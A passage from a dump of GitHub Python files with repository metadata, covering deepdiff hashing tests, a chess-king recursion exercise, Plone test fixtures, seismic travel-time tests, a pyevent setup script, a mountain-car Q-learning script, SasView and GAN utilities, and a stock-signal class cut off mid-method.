'list:dict:{str:z:int:3}'}\n dic2 = {\"z\": 3}\n t2 = [dic2]\n t2_hash = DeepHashPrep(t2, exclude_obj_callback=exclude_obj_callback)\n assert t1_hash[t1] == t2_hash[t2]\n\n def test_string_case(self):\n t1 = \"Hello\"\n\n t1_hash = DeepHashPrep(t1)\n assert t1_hash == {'Hello': 'str:Hello'}\n\n t1_hash = DeepHashPrep(t1, ignore_string_case=True)\n assert t1_hash == {'Hello': 'str:hello'}\n\n def test_hash_class(self):\n t1 = ClassC\n t1_hash = DeepHashPrep(t1)\n assert t1_hash['class_attr'] == 'str:class_attr'\n assert t1_hash[0] == 'int:0'\n # Note: we ignore private names in calculating hashes now. So you dont see __init__ here for example.\n assert t1_hash[t1] == r'objClassC:{str:class_attr:int:0}'\n\n def test_hash_set_in_list(self):\n t1 = [{1, 2, 3}, {4, 5}]\n t1_hash = DeepHashPrep(t1)\n assert t1_hash[t1] == 'list:set:int:1,int:2,int:3,set:int:4,int:5'\n\n def test_hash_numpy_array1(self):\n t1 = np.array([[1, 2]], np.int8)\n t2 = np.array([[2, 1]], np.int8)\n t1_hash = DeepHashPrep(t1)\n t2_hash = DeepHashPrep(t2)\n assert t1_hash[t1] == 'ndarray:ndarray:int8:1,int8:2'\n assert t2_hash[t2] == t1_hash[t1]\n\n def test_hash_numpy_array_ignore_numeric_type_changes(self):\n t1 = np.array([[1, 2]], np.int8)\n t1_hash = DeepHashPrep(t1, ignore_numeric_type_changes=True)\n assert t1_hash[t1] == 'ndarray:ndarray:number:1.000000000000,number:2.000000000000'\n\n def test_hash_numpy_array2_multi_dimensional_can_not_retrieve_individual_array_item_hashes(self):\n \"\"\"\n This is a very interesting case. When DeepHash extracts t1[0] to create a hash for it,\n Numpy creates an array. But that array will only be technically available during the DeepHash run.\n Once DeepHash is run, the array is marked to be deleted by the garbage collector.\n However depending on the version of the python and the machine that runs it, by the time we get\n to the line that is t1_hash[t1[0]], the t1[0] may or may not be still in memory.\n If it is still in the memory, t1_hash[t1[0]] works without a problem.\n If it is already garbage collected, t1_hash[t1[0]] will throw a key error since there will be\n a new t1[0] by the time t1_hash[t1[0]] is called. Hence it will have a new ID and thus it\n will not be available anymore in t1_hash. 
Remember that since NumPy arrays are not hashable,\n        the ID of the array is stored in t1_hash as a key and not the object itself.\n        \"\"\"\n        t1 = np.array([[1, 2, 3, 4], [4, 2, 2, 1]], np.int8)\n        t1_hash = DeepHashPrep(t1)\n        try:\n            t1_hash[t1[0]]\n        except Exception as e:\n            assert str(e).strip(\"'\") == HASH_LOOKUP_ERR_MSG.format(t1[0])\n\n\nclass TestDeepHashSHA:\n    \"\"\"DeepHash with SHA Tests.\"\"\"\n\n    def test_str_sha1(self):\n        obj = \"a\"\n        expected_result = {\n            obj: '86f7e437faa5a7fce15d1ddcb9eaeaea377667b8'\n        }\n        result = DeepHash(obj, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)\n        assert expected_result == result\n\n    def test_str_sha256(self):\n        obj = \"a\"\n        expected_result = {\n            obj: 'ca978112ca1bbdcafac231b39a23dc4da786eff8147c4e72b9807785afee48bb'\n        }\n        result = DeepHash(obj, ignore_string_type_changes=True, hasher=DeepHash.sha256hex)\n        assert expected_result == result\n\n    def test_prep_str_sha1_fail_if_mutable(self):\n        \"\"\"\n        This test fails if DeepHash receives a mutable copy of hashes,\n        which would mean each DeepHash init carries hashes over from\n        the previous init.\n        \"\"\"\n        obj1 = \"a\"\n        expected_result = {\n            obj1: '86f7e437faa5a7fce15d1ddcb9eaeaea377667b8'\n        }\n        result = DeepHash(obj1, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)\n        assert expected_result == result\n        obj2 = \"b\"\n        result = DeepHash(obj2, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)\n        assert obj1 not in result\n\n    def test_bytecode(self):\n        obj = b\"a\"\n        expected_result = {\n            obj: '86f7e437faa5a7fce15d1ddcb9eaeaea377667b8'\n        }\n        result = DeepHash(obj, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)\n        assert expected_result == result\n\n    def test_list1(self):\n        string1 = \"a\"\n        obj = [string1, 10, 20]\n        expected_result = {\n            string1: '86f7e437faa5a7fce15d1ddcb9eaeaea377667b8',\n            get_id(obj): 'eac61cbd194e5e03c210a3dce67b9bfd6a7b7acb',\n            10: DeepHash.sha1hex('int:10'),\n            20: DeepHash.sha1hex('int:20'),\n        }\n        result = DeepHash(obj, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)\n        assert expected_result == result\n\n    def test_dict1(self):\n        string1 = \"a\"\n        key1 = \"key1\"\n        obj = {key1: string1, 1: 10, 2: 20}\n        expected_result = {\n            1: DeepHash.sha1hex('int:1'),\n            10: DeepHash.sha1hex('int:10'),\n            2: DeepHash.sha1hex('int:2'),\n            20: DeepHash.sha1hex('int:20'),\n            key1: '1073ab6cda4b991cd29f9e83a307f34004ae9327',\n            string1: '86f7e437faa5a7fce15d1ddcb9eaeaea377667b8',\n            get_id(obj): '11e23f096df81b1ccab0c309cdf8b4ba5a0a6895'\n        }\n        result = DeepHash(obj, ignore_string_type_changes=True, hasher=DeepHash.sha1hex)\n        assert expected_result == result\n\n\nclass TestCleaningString:\n\n    @pytest.mark.parametrize(\"text, ignore_string_type_changes, expected_result\", [\n        (b'hello', True, 'hello'),\n        (b'hello', False, 'bytes:hello'),\n        ('hello', True, 'hello'),\n        ('hello', False, 'str:hello'),\n    ])\n    def test_clean_type(self, text, ignore_string_type_changes, expected_result):\n        result = prepare_string_for_hashing(text, ignore_string_type_changes=ignore_string_type_changes)\n        assert expected_result == result\n\n\nclass TestCounts:\n\n    @pytest.mark.parametrize('obj, expected_count', [\n        (\n            {1: 1, 2: 3},\n            5\n        ),\n        (\n            {\"key\": {1: 1, 2: 4}, \"key2\": [\"a\", \"b\"]},\n            11\n        ),\n        (\n            [{1}],\n            3\n        ),\n        (\n            [ClassC(a=10, b=11)],\n            6\n        )\n    ])\n    def test_dict_count(self, obj, expected_count):\n        \"\"\"\n        How many objects went into building this object?\n        \"\"\"\n\n        result = DeepHash(obj).get(obj, extract_index=1)\n        assert expected_count == result\n\n\nclass 
TestOtherHashFuncs:\n\n    @pytest.mark.parametrize('items, prefix, expected', [\n        ([[1], [2]], 'pre', 'pre583852d84b3482edf53408b64724a37289d7af458c44bb989a8abbffe24d2d2b'),\n        ([[1], [2]], b'pre', 'pre583852d84b3482edf53408b64724a37289d7af458c44bb989a8abbffe24d2d2b'),\n    ])\n    def test_combine_hashes_lists(self, items, prefix, expected):\n        result = combine_hashes_lists(items, prefix)\n        assert expected == result\n\n    EXPECTED_MESSAGE1 = (\n        \"'utf-8' codec can't decode byte 0xc3 in position 0: invalid continuation byte in '('. \"\n        \"Please either pass ignore_encoding_errors=True or pass the encoding via encodings=['utf-8', '...'].\")\n\n    EXPECTED_MESSAGE2 = (\n        \"'utf-8' codec can't decode byte 0xbc in position 0: invalid start byte in ' cup of flour'. \"\n        \"Please either pass ignore_encoding_errors=True or pass the encoding via encodings=['utf-8', '...'].\")\n\n    EXPECTED_MESSAGE3 = (\n        \"'utf-8' codec can't decode byte 0xc3 in position 34: invalid continuation byte in '...up of potatos. Then ( cup of flour'. Please either pass ignore_encoding_errors=True or \"\n        \"pass the encoding via encodings=['utf-8', '...'].\"\n    )\n\n    @pytest.mark.parametrize('test_num, item, encodings, ignore_encoding_errors, expected_result, expected_message', [\n        (1, b'\\xc3\\x28', None, False, UnicodeDecodeError, EXPECTED_MESSAGE1),\n        (2, b'\\xc3\\x28', ['utf-8'], False, UnicodeDecodeError, EXPECTED_MESSAGE1),\n        (3, b'\\xc3\\x28', ['utf-8'], True, {b'\\xc3(': '640da73f0d9b268a0a7ae884d77063d1193f43a651352f9032d99a8fe1705546'}, None),\n        (4, b\"\\xbc cup of flour\", ['utf-8'], False, UnicodeDecodeError, EXPECTED_MESSAGE2),\n        (5, b\"\\xbc cup of flour\", ['utf-8'], True, {b'\\xbc cup of flour': '86ac12eb5e35db88cf93baca1d62098023b2d93d634e75fb4e37657e514f3d51'}, None),\n        (6, b\"\\xbc cup of flour\", ['utf-8', 'latin-1'], False, {b'\\xbc cup of flour': 'cfc354ae2232a8983bf59b2004f44fcb4036f57df1d08b9cde9950adea3f8d3e'}, None),\n        (7, b\"First have a cup of potatos. Then \\xc3\\x28 cup of flour\", None, False, UnicodeDecodeError, EXPECTED_MESSAGE3),\n    ])\n    def test_hash_encodings(self, test_num, item, encodings, ignore_encoding_errors, expected_result, expected_message):\n        if UnicodeDecodeError == expected_result:\n            with pytest.raises(expected_result) as exc_info:\n                DeepHash(item, encodings=encodings, ignore_encoding_errors=ignore_encoding_errors)\n            assert expected_message == str(exc_info.value), f\"test_encodings test #{test_num} failed.\"\n        else:\n            result = DeepHash(item, encodings=encodings, ignore_encoding_errors=ignore_encoding_errors)\n            assert expected_result == result, f\"test_encodings test #{test_num} failed.\"\n","repo_name":"seperman/deepdiff","sub_path":"tests/test_hash.py","file_name":"test_hash.py","file_ext":"py","file_size_in_byte":32066,"program_lang":"python","lang":"en","doc_type":"code","stars":1785,"dataset":"github-code","pt":"52"} +{"seq_id":"73521751204","text":"\"\"\"\nOn an 8x8 chessboard, each square is assigned a natural number. Two restrictions are placed on the\nking's moves: the king may move to one of the 8 adjacent squares only if the last digit of the number\non the square it currently stands on is smaller than the first digit of the number on the target\nsquare, and on its way to the chosen goal (e.g. a corner) the king may not make a move that takes it\nfarther away from the goal. A global array T[8][8] filled with natural numbers represents the\nchessboard. The upper-left corner has coordinates\nw=0 and k=0. 
Please write a function that checks whether the king can get from square (w, k) to the\nbottom-right corner.\n\"\"\"\nfrom random import randint\n\n# A square (w_cur, k_cur) can be entered from (w_last, k_last) when the first digit of its number\n# (value // 10**(digit_count - 1)) is greater than the last digit (value % 10) of the previous square.\ndef func(T, w_cur, k_cur, w_last, k_last):\n    if w_cur == k_cur and w_cur == len(T) - 1:\n        if (T[w_cur][k_cur] // 10**(len(str(T[w_cur][k_cur])) - 1)) > (T[w_last][k_last] % 10):\n            return True\n    elif w_cur == len(T) - 1:\n        if (T[w_cur][k_cur] // 10**(len(str(T[w_cur][k_cur])) - 1)) > (T[w_last][k_last] % 10):\n            return func(T, w_cur, k_cur + 1, w_cur, k_cur)\n    elif k_cur == len(T) - 1:\n        if (T[w_cur][k_cur] // 10**(len(str(T[w_cur][k_cur])) - 1)) > (T[w_last][k_last] % 10):\n            return func(T, w_cur + 1, k_cur, w_cur, k_cur)\n    elif (T[w_cur][k_cur] // 10**(len(str(T[w_cur][k_cur])) - 1)) > (T[w_last][k_last] % 10):\n\n        return func(T, w_cur, k_cur + 1, w_cur, k_cur) or func(T, w_cur + 1, k_cur + 1, w_cur, k_cur) or func(T, w_cur + 1, k_cur, w_cur, k_cur)\n\n\n\n#T = [[randint(1, 9) for _ in range(5)] for _ in range(5)]\nT = [[1,2,3],[1,2,3],[1,2,3]]\n\nfor x in T:\n    print(x)\n\ndef rekur(T):\n    return func(T, 0, 1, 0, 0) or func(T, 1, 1, 0, 0) or func(T, 1, 0, 0, 0)\n\n\nprint(rekur(T))\n\n\n\n","repo_name":"Gygrus/WDI-ASD-course-Python","sub_path":"Semestr I/zestaw_6/cw18.py","file_name":"cw18.py","file_ext":"py","file_size_in_byte":1759,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7915054506","text":"# -*- coding: utf-8 -*-\nfrom plone.app.contenttypes.testing import PLONE_APP_CONTENTTYPES_FIXTURE\nfrom plone.app.robotframework.testing import REMOTE_LIBRARY_BUNDLE_FIXTURE\nfrom plone.app.testing import applyProfile\nfrom plone.app.testing import FunctionalTesting\nfrom plone.app.testing import IntegrationTesting\nfrom plone.app.testing import PloneSandboxLayer\nfrom plone.testing import z2\n\nimport oli.areadme\n\n\nclass OliAreadmeLayer(PloneSandboxLayer):\n\n    defaultBases = (PLONE_APP_CONTENTTYPES_FIXTURE,)\n\n    def setUpZope(self, app, configurationContext):\n        self.loadZCML(package=oli.areadme)\n\n    def setUpPloneSite(self, portal):\n        applyProfile(portal, 'oli.areadme:default')\n\n\nOLI_AREADME_FIXTURE = OliAreadmeLayer()\n\n\nOLI_AREADME_INTEGRATION_TESTING = IntegrationTesting(\n    bases=(OLI_AREADME_FIXTURE,),\n    name='OliAreadmeLayer:IntegrationTesting'\n)\n\n\nOLI_AREADME_FUNCTIONAL_TESTING = FunctionalTesting(\n    bases=(OLI_AREADME_FIXTURE,),\n    name='OliAreadmeLayer:FunctionalTesting'\n)\n\n\nOLI_AREADME_ACCEPTANCE_TESTING = FunctionalTesting(\n    bases=(\n        OLI_AREADME_FIXTURE,\n        REMOTE_LIBRARY_BUNDLE_FIXTURE,\n        z2.ZSERVER_FIXTURE\n    ),\n    name='OliAreadmeLayer:AcceptanceTesting'\n)\n","repo_name":"olimpiurob/oli.areadme","sub_path":"src/oli/areadme/testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"9424252195","text":"from __future__ import annotations\n\nimport logging\nfrom pathlib import Path\nfrom tempfile import TemporaryDirectory\n\nimport numpy as np\nimport pytest\n\nfrom lassie.models.location import Location\nfrom lassie.models.station import Station, Stations\nfrom lassie.octree import Octree\nfrom lassie.tracers.cake import CakeTracer, EarthModel, Timing, TravelTimeTree\nfrom lassie.tracers.constant_velocity import ConstantVelocityTracer\n\nKM = 1e3\nCONSTANT_VELOCITY = 5 * KM\n\n\n@pytest.fixture(scope=\"session\")\ndef small_octree() -> Octree:\n    return Octree(\n        location=Location(\n            lat=10.0,\n            lon=10.0,\n            elevation=0.2 * KM,\n        ),\n        
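# A deliberately small search volume keeps this fixture fast; the sizes and bounds below are arbitrary test geometry.\n        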
size_initial=0.5 * KM,\n size_limit=50,\n east_bounds=(-2 * KM, 2 * KM),\n north_bounds=(-2 * KM, 2 * KM),\n depth_bounds=(0 * KM, 2 * KM),\n absorbing_boundary=1 * KM,\n )\n\n\n@pytest.fixture(scope=\"session\")\ndef small_stations() -> Stations:\n rng = np.random.default_rng(1232)\n n_stations = 20\n stations: list[Station] = []\n for i_sta in range(n_stations):\n station = Station(\n network=\"XX\",\n station=\"STA%02d\" % i_sta,\n lat=10.0,\n lon=10.0,\n elevation=rng.uniform(0, 0.1) * KM,\n depth=rng.uniform(0, 0.1) * KM,\n north_shift=rng.uniform(-2, 2) * KM,\n east_shift=rng.uniform(-2, 2) * KM,\n )\n stations.append(station)\n return Stations(stations=stations)\n\n\ndef test_sptree_model(travel_time_tree: TravelTimeTree):\n model = travel_time_tree\n\n with TemporaryDirectory() as d:\n tmp = Path(d)\n file = model.save(tmp)\n\n model2 = TravelTimeTree.load(file)\n model2._load_sptree()\n\n source = Location(\n lat=0.0,\n lon=0.0,\n north_shift=1 * KM,\n east_shift=1 * KM,\n depth=5.0 * KM,\n )\n receiver = Location(\n lat=0.0,\n lon=0.0,\n north_shift=0 * KM,\n east_shift=0 * KM,\n depth=0,\n )\n\n model.get_travel_time(source, receiver)\n\n\ndef test_lut(\n travel_time_tree: TravelTimeTree,\n octree: Octree,\n stations: Stations,\n) -> None:\n model = travel_time_tree\n model.init_lut(octree, stations)\n\n traveltimes_tree = model.interpolate_travel_times(octree, stations)\n traveltimes_lut = model.get_travel_times(octree, stations)\n np.testing.assert_equal(traveltimes_tree, traveltimes_lut)\n\n # Test refilling the LUT\n model._node_lut.clear()\n traveltimes_tree = model.interpolate_travel_times(octree, stations)\n traveltimes_lut = model.get_travel_times(octree, stations)\n np.testing.assert_equal(traveltimes_tree, traveltimes_lut)\n assert len(model._node_lut) > 0, \"did not refill lut\"\n\n stations_selection = stations.model_copy()\n stations_selection.stations = stations_selection.stations[:5]\n traveltimes_tree = model.interpolate_travel_times(octree, stations_selection)\n traveltimes_lut = model.get_travel_times(octree, stations_selection)\n np.testing.assert_equal(traveltimes_tree, traveltimes_lut)\n\n\n@pytest.mark.asyncio\nasync def test_travel_times_constant_velocity(\n small_octree: Octree,\n small_stations: Stations,\n):\n octree = small_octree\n stations = small_stations\n octree.size_limit = 200\n cake_tracer = CakeTracer(\n phases={\"cake:P\": Timing(definition=\"P,p\")},\n earthmodel=EarthModel(\n filename=None,\n raw_file_data=f\"\"\"\n -2.0 {CONSTANT_VELOCITY/KM:.1f} 2.0 2.7\n 12.0 {CONSTANT_VELOCITY/KM:.1f} 2.0 2.7\n\"\"\",\n ),\n )\n constant = ConstantVelocityTracer(\n velocity=CONSTANT_VELOCITY,\n )\n\n await cake_tracer.prepare(octree, stations)\n\n cake_travel_times = cake_tracer.get_travel_times(\"cake:P\", octree, stations)\n constant_traveltimes = constant.get_travel_times(\"constant:P\", octree, stations)\n\n nan_mask = np.isnan(cake_travel_times)\n logging.warning(\"percent nan: %.1f\", (nan_mask.sum() / nan_mask.size) * 100)\n\n constant_traveltimes[nan_mask] = np.nan\n np.testing.assert_almost_equal(cake_travel_times, constant_traveltimes, decimal=2)\n","repo_name":"pyrocko/lassie-v2","sub_path":"test/test_cake.py","file_name":"test_cake.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"52"} +{"seq_id":"73565424806","text":"#!/usr/bin/env python\n\nimport argparse\nfrom subprocess import check_output\nimport json\nimport os\nfrom pathlib import Path\n\n\ndef 
main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument(\"hyps\")\n    parser.add_argument(\"refs\")\n    args = parser.parse_args()\n\n    e2e_eval_script = (\n        Path(__file__).parent / \"e2e-metrics\" / \"measure_scores.py\"\n    )\n\n    with open(os.devnull, \"w\") as DEVNULL:\n        output = check_output(\n            \"python {} {} {}\".format(\n                e2e_eval_script, args.refs, args.hyps),\n            shell=True,\n            stderr=DEVNULL).decode(\"utf8\")\n\n    results = {}\n    for line in output.strip().split(\"\\n\")[2:]:\n        metric, score = line.split(\": \")\n        score = float(score)\n        results[metric] = score\n    print(json.dumps(results))\n\nif __name__ == \"__main__\":\n    main()\n","repo_name":"kedz/noiseylg","sub_path":"eval_scripts/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"52"} +{"seq_id":"22329462546","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport glob\nimport os\nimport sys\nimport warnings\nimport itertools\n\ntry:\n    import setuptools\nexcept ImportError:\n    import distutils.core as setuptools\n\nLIBEVENT_BUILD_DIR = '../libevent*'\n\ndef get_best_build_dir():\n    candidates = reversed(glob.glob(LIBEVENT_BUILD_DIR))\n    matches = (dir for dir in candidates if os.path.isdir(dir))\n    try:\n        best = next(matches)\n        print('found libevent build directory', best)\n    except StopIteration:\n        warnings.warn(\"Could not find libevent\")\n        best = '../libevent'\n    return best\n\ndef get_extension():\n    event = setuptools.Extension(name='event', sources=['event.c'])\n    system_libs = itertools.chain(\n        glob.iglob('/usr/lib/libevent.*'),\n        glob.iglob('/usr/lib64/libevent.*'),\n    )\n    if any(system_libs):\n        print('found system libevent for', sys.platform)\n        event.libraries = ['event']\n        return event\n    for prefix in (sys.prefix, \"/usr/local\", \"/opt/local\"):\n        if glob.glob(\"%s/lib/libevent.*\" % prefix):\n            print('found installed libevent in', prefix)\n            event.include_dirs = ['%s/include' % prefix]\n            event.library_dirs = ['%s/lib' % prefix]\n            event.libraries = ['event']\n            return event\n\n    ev_dir = get_best_build_dir()\n    event.include_dirs.append(ev_dir)\n\n    if sys.platform == 'win32':\n        event.include_dirs.extend([\n            '%(ev_dir)s/WIN32-Code' % locals(),\n            '%(ev_dir)s/compat' % locals()\n        ])\n        sources = ['WIN32-Code/win32.c', 'log.c', 'event.c']\n        sources = [os.path.join(ev_dir, source) for source in sources]\n        event.sources.extend(sources)\n        event.extra_compile_args.extend(['-DWIN32', '-DHAVE_CONFIG_H'])\n        event.libraries.append('wsock32')\n    else:\n        event.extra_objects.extend(glob.glob('%(ev_dir)s/*.o' % locals()))\n\n    return event\n\nsetup_params = dict(\n    name='event',\n    version='0.4.3',\n    author='Dug Song',\n    author_email='dugsong@monkey.org',\n    maintainer='Jason R. 
Coombs',\n maintainer_email='jaraco@jaraco.com',\n url='https://github.com/jaraco/pyevent',\n description='event library',\n long_description=\"\"\"This module provides a mechanism to execute a function when a specific event on a file handle, file descriptor, or signal occurs, or after a given time has passed.\"\"\",\n license='BSD',\n ext_modules = [get_extension()],\n)\n\nif __name__ == '__main__':\n setuptools.setup(**setup_params)\n","repo_name":"jaraco/pyevent","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":2532,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"38832136420","text":"from environment import MountainCar\nimport sys\nimport numpy as np\nfrom random import randint\n\ndef main(args):\n pass\n\ndef q_val(state, weight, bias, mode):\n if mode == 'raw':\n s = np.zeros(2)\n else:\n s = np.zeros(2048)\n for key,val in state.items():\n s[key] = val\n return (np.dot(np.array(s), weight) + bias), np.array(s)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n \n mode = sys.argv[1]\n weight_out = sys.argv[2]\n returns_out = sys.argv[3]\n episodes = int(sys.argv[4])\n max_iterations = int(sys.argv[5])\n epsilon = float(sys.argv[6])\n gamma = float(sys.argv[7])\n learning_rate = float(sys.argv[8])\n\n alpha = learning_rate\n\n \n x = MountainCar(mode)\n if mode == 'raw': \n w = np.zeros([2,3],dtype=float)\n else:\n w = np.zeros([2048,3],dtype=float)\n bias = 0.0\n \n ##print(x.state)\n \n \n ##print(q(x.state,1, w, bias))\n '''\n q = q_val(x.state, w, bias)\n for a in range(3):\n next_state, reward, done = x.step(a)\n q_next = q_val(next_state, w, bias)\n current_state = np.array([x.state[0], x.state[1]])\n ##print(alpha * (q[a] -(reward + (gamma * max(q_next)))) * current_state)\n w[:,0] = w[:,0] - (alpha * (q[a] -(reward + (gamma * max(q_next)))) * current_state)\n\n print(w)\n \n '''\n \n rng = np.random.RandomState()\n seed = rng.randint(2**31 - 1)\n rng.seed(seed)\n \n \n returns_out_file= open(returns_out,\"w\")\n \n for e in range(episodes):\n state = x.reset()\n #print(state)\n total_rewards = 0\n ##q = q_val(state, w, bias) \n ##a = np.argmax(q)\n \n \n for i in range(max_iterations):\n \n q, current_state = q_val(state, w, bias, mode) \n a = np.argmax(q)\n next_state, reward, done = x.step(a)\n q_next, next_state_np = q_val(next_state, w, bias, mode)\n next_random_action = rng.randint(0,2+1)\n ##current_state = np.array([x.state[0], x.state[1]])\n \n update = float(alpha) * (q[a] - (float(reward) + (float(gamma) * ((max(q_next) * (1.0 - epsilon)) + (q_next[next_random_action] * epsilon )))))\n ##w[:,a] = w[:,a] - (alpha * ((q[a] -(reward + (gamma * ((max(q_next) * (1.0 - epsilon)) + (q_next[next_random_action] * epsilon))))) * current_state))\n w[:,a] = w[:,a] - (update * current_state)\n \n ##w[:,next_random_action] = w[:,next_random_action] - (alpha * (q[next_random_action] -(reward + (gamma * q_next[next_random_action] * (epsilon)))) * current_state)\n \n \n bias = bias - update\n \n state = next_state\n ##q = q_next\n ##a = np.argmax(q) \n if done :\n total_rewards = total_rewards + reward\n break\n total_rewards = total_rewards + reward\n \n \n returns_out_file.write(str(total_rewards) + \"\\n\")\n \n \n #print(bias) \n w_flat = w.flatten(order='C')\n weights = np.insert(w_flat,0,bias)\n np.savetxt(weight_out, weights)\n returns_out_file.close()\n \n \n \n \n \n ","repo_name":"dpbird/Machine-Learning-Algorithms","sub_path":"ReInforcement Learning - Q Learning/code and 
data/python/q_learning.py","file_name":"q_learning.py","file_ext":"py","file_size_in_byte":3217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41469374758","text":"\"\"\"\n Unit tests for slit_length_calculator\n\"\"\"\n\nimport os.path\nimport unittest\nfrom sasdata.dataloader.readers.ascii_reader import Reader\nfrom sas.sascalc.calculator.slit_length_calculator import SlitlengthCalculator \\\n as calculator\n\n\ndef find(filename):\n return os.path.join(os.path.dirname(__file__), 'data', filename)\n\n\nclass SlitCalculator(unittest.TestCase):\n \n def setUp(self):\n \n self.reader = Reader()\n \n def test_slit_length_calculation(self):\n \"\"\"\n Test slit_length_calculator\"\n \"\"\"\n list = self.reader.read(find(\"beam profile.DAT\"))\n self.assertTrue(len(list) == 1)\n f = list[0]\n cal = calculator()\n cal.set_data(f.x,f.y)\n slit_length = cal.calculate_slit_length()\n \n # The value \"5.5858\" was obtained by manual calculation.\n # It turns out our slit length is FWHM/2\n self.assertAlmostEqual(slit_length, 5.5858/2, 3)\n \n \nif __name__ == '__main__':\n unittest.main()\n \n","repo_name":"SasView/sasview","sub_path":"test/sascalculator/utest_slit_length_calculator.py","file_name":"utest_slit_length_calculator.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"52"} +{"seq_id":"12983832275","text":"\n\"\"\" @author : Bivek Panthi\n\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\n\ndef random_shuffle(x_tensor, y_tensor):\n \"\"\"\n Function to shuffle two tensor in same order\n\n Parameters : \n x_tensor : first tensor to shuffle\n y_tensor : second tensor to shuffle\n\n \"\"\"\n idx = tf.range(start=0, limit=tf.shape(x_tensor)[0], dtype=tf.int32)\n shuffled_idx = tf.random.shuffle(idx)\n x_tensor, y_tensor = tf.gather(x_tensor, shuffled_idx), tf.gather(y_tensor, shuffled_idx)\n return x_tensor, y_tensor\n\ndef random_generator(shape_):\n \"\"\"\n Function to generate random gaussian noise of shape 'shape_'\n\n Parameters : \n shape_ : shape of the gaussian noise tensor\n \"\"\"\n random_gaussian_vectors = tf.random.normal(shape=shape_)\n random_gaussian_vectors = tf.cast(random_gaussian_vectors, dtype=tf.float64)\n # combine_vector = tf.concat([random_gaussian_vectors], axis=1)\n return tf.cast(random_gaussian_vectors, dtype=tf.float64)\n\ndef unison_shuffle(arr1 : np.array, arr2 : np.array):\n \"\"\"\n Function to shuffle two numpy arrays in same order\n\n Parameters : \n arr1 : first numpy array to shuffle\n arr2 : second numpy array to shuffle\n \"\"\"\n assert len(arr1) == len(arr2)\n p = np.random.permutation(len(arr1))\n return arr1[p], arr2[p]\n\ndef __gen(reader):\n while True:\n temp = reader(2**16)\n if not temp: break\n yield temp\n\ndef buf_count_newlines(filename : str):\n \"\"\"\n Function to count the number of newline characters\n\n Parameters : \n filename : name of the file to count the newline\n \"\"\"\n with open(filename, \"rb\") as fb:\n count = sum(buf.count(b\"\\n\") for buf in __gen(fb.raw.read))\n return count\n\ndef ExtractLines(filename : str, n : int, line_length : int = 14):\n \"\"\"\n Function to extract specific lines from a file\n\n Parameters : \n filename : name of the file to extract lines\n n : file sequence number. 
Used for structing the filename \n line_length : length of lines to extract\n \"\"\"\n with open(filename, 'r') as fp:\n x = fp.readlines()[n*line_length:(n+1)*line_length]\n output_filename = 'molecule{:05d}.xyz'.format(n)\n with open(output_filename, \"w\") as text_file:\n text_file.writelines(x)","repo_name":"panthibivek/Generative-Adversarial-Network-for-Improving-Sampling-of-Molecular-Trajectories","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8664246407","text":"from datetime import timedelta\nfrom enum import Enum\n\nfrom .timeseries import TimeSeries\n\n\nclass StockSignal(Enum):\n buy = 1\n neutral = 0\n sell = -1\n\n\nclass Stock:\n LONG_TERM_TIMESPAN = 10\n SHORT_TERM_TIMESPAN = 5\n\n def __init__(self, symbol):\n self.symbol = symbol\n self.history = TimeSeries()\n\n @property\n def price(self):\n try:\n return self.history[-1].value\n except IndexError:\n return None\n\n def update(self, timestamp, price):\n if price < 0:\n raise ValueError(\"price should not be negative\")\n self.history.update(timestamp, price)\n\n def is_increasing_trend(self):\n return self.history[-3].value < self.history[-2].value < self.history[-1].value\n\n def _get_closing_price_list(self, on_date, num_days):\n closing_price_list = []\n for i in range(num_days):\n chk = on_date.date() - timedelta(i)\n for price_event in reversed(self.price_history):\n if price_event.timestamp.date() > chk:\n pass\n if price_event.timestamp.date() == chk:\n closing_price_list.insert(0, price_event)\n break\n if price_event.timestamp.date() < chk:\n closing_price_list.insert(0, price_event)\n break\n return closing_price_list\n\n def _is_crossover_below_to_above(self, prev_ma, prev_reference_ma,\n current_ma, current_reference_ma):\n return prev_ma < prev_reference_ma and current_ma > current_reference_ma\n\n def get_crossover_signal(self, on_date):\n NUM_DAYS = self.LONG_TERM_TIMESPAN + 1\n closing_price_list = self.history.get_closing_price_list(on_date, NUM_DAYS)\n\n if len(closing_price_list) < NUM_DAYS:\n return StockSignal.neutral\n\n long_term_series = closing_price_list[-self.LONG_TERM_TIMESPAN:]\n prev_long_term_series = closing_price_list[-self.LONG_TERM_TIMESPAN-1:-1]\n short_term_series = closing_price_list[-self.SHORT_TERM_TIMESPAN:]\n prev_short_term_series = closing_price_list[-self.SHORT_TERM_TIMESPAN-1:-1]\n\n long_term_ma = sum([update.value\n for update in long_term_series])/self.LONG_TERM_TIMESPAN\n prev_long_term_ma = sum([update.value\n for update in prev_long_term_series])/self.LONG_TERM_TIMESPAN\n short_term_ma = sum([update.value\n for update in short_term_series])/self.SHORT_TERM_TIMESPAN\n prev_short_term_ma = sum([update.value\n for update in prev_short_term_series])/self.SHORT_TERM_TIMESPAN\n\n if self._is_crossover_below_to_above(prev_short_term_ma, prev_long_term_ma,\n short_term_ma, long_term_ma):\n return StockSignal.buy\n\n if 